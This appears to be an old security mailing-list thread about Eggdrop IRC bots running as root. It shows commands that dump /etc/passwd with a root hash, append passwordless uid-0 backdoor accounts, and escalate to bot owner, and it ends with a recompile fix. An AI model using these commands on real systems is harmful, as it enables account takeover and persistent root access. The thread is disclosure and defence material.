Eggdrops bots can access files all over the system if you're owner and the bot runs with root permissions. You can get the passwd when you're the owner of the bot, and also modify it if the bot is running with the root permissions. Tested in an Eggdrop bot 1.0p .tcl exec cat /etc/passwd [1:21] Tcl: root:zWCF/X7irjQ4E:0:0:root:/:/bin/bash [1:21] Tcl: bin:*:1:1:bin:/bin: [1:21] Tcl: daemon:*:2:2:daemon:/sbin: [1:21] Tcl: adm:*:3:4:adm:/var/adm: [1:21] Tcl: lp:*:4:7:lp:/var/spool/lpd: [1:21] Tcl: sync:*:5:0:sync:/sbin:/bin/sync you can also try .tcl exec echo "stupid::394:100:/:/bin/bash" >> /etc/passwd and telnet to the host of the bot you can try to make .rhosts and all shit you may think. Think 'bout that ;) ------------------------------------------------------------------------------------ > Eggdrops bots can access files all over the system if you're owner and > the bot runs with root permissions. 1) who runs a bot as root? 2) who gives away owner-access? Come on!.... echo "forgot::0:0::/:/bin/sh" >> /etc/passwd; echo "If you forgot your password, then login as 'forgot' with no password, and do "passwd " >> /etc/issue What a huge security hole! ------------------------------------------------------------------------------------ >> Eggdrops bots can access files all over the system if you're owner and >> the bot runs with root permissions. > >1) who runs a bot as root? >2) who gives away owner-access? I have come across many bots being run as root. So people should look out. And in earlier versions of Eggdrop there is one serious bug to become OWNER when someone has master access. I will demonstrate on eggdrop 0.9p, this bug still works in lotsa newer versions as well: .set owner Chotaire .chattr Chotaire +n When another owner tries to remove your owner and master access, you will still be able to re-"own" yourself unless they have detected you in the .set owner variable. That's it... Now for FIXING YOUR TCL problem, take a look at this one... $eggdrop/src/eggdrop.h #undef ENABLE_TCL recompile your bot, and that's it... no more problems. -------------------------------------------------------------------------------------